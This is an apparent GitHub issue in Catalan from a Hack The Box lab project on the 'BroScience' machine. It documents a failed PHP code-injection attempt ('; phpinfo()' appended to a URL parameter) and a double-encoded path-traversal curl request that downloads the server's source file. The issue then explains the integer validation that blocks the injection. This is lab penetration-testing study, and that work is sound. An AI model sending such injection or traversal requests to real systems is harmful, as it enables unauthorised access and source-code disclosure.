search

AngelMascaro / broscience_htb_hackingoldschool

0 stars 0 forks source link

Attack plan #4 - Code injection #19

Closed cpratlao closed 1 year ago

cpratlao commented 1 year ago

Persona --> Cristian Temps --> 27/02/2023 --> 20:20 - 20:40 Acció --> Code injection. Endpoint --> https://broscience.htb/exercise.php?id=2 Resultat --> No es pot injectar codi Output:

Mirarem d'injectar codi en l'URL d'un dels post de la pàgina a veure si no validen els arguments. Agafem l'URL d'un dels posts:

https://broscience.htb/exercise.php?id=2

I li afegim al final --> ; phpinfo():

https://broscience.htb/exercise.php?id=2; phpinfo()

Com a resultat obtenim:

Invalid ID value

Per tant, no es pot fer un code injecction.

Com hem aconseguit fer un path traversal per descarregar-nos fitxers en els passos anteriors examinarem el fitxer "exercice.php":

┌─[lao@parrot]─[~/broscience]
└──╼ $curl --insecure https://broscience.htb/includes/img.php?path=..%252fexercise.php > exercise.php
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4969  100  4969    0     0  39335      0 --:--:-- --:--:-- --:--:-- 39436
┌─[lao@parrot]─[~/broscience]
└──╼ $cat exercise.php | sed -n 4,25p
if (isset($_GET['id'])) {
    if (!empty($_GET['id'])) {
        if (filter_var($_GET['id'], FILTER_VALIDATE_INT)) {
            include_once 'includes/db_connect.php';

            $res = pg_prepare($db_conn, "get_exercise_query", 'SELECT exercises.id, username, title, image, content, exercises.date_created, users.id FROM exercises JOIN users ON author_id = users.id WHERE exercises.id=$1');
            $res = pg_execute($db_conn, "get_exercise_query", array($_GET['id']));

            if (pg_num_rows($res) > 0) {     
                $row = pg_fetch_row($res);
            } else {
                $alert = "No exercise with that ID";
            }
        } else {
            $alert = "Invalid ID value";
        }
    } else {
        $alert = "Empty ID value";
    }
} else {
    $alert = "Missing ID value";
}

Com veiem en el codi hi ha un "filter_var":

if (filter_var($_GET['id'], FILTER_VALIDATE_INT)) {

Que valida que el valor de la id del exercici sigui un INT i com el que injectem no ho és ens retorna FALSE i la seva corresponent resposta:

$alert = "Invalid ID value";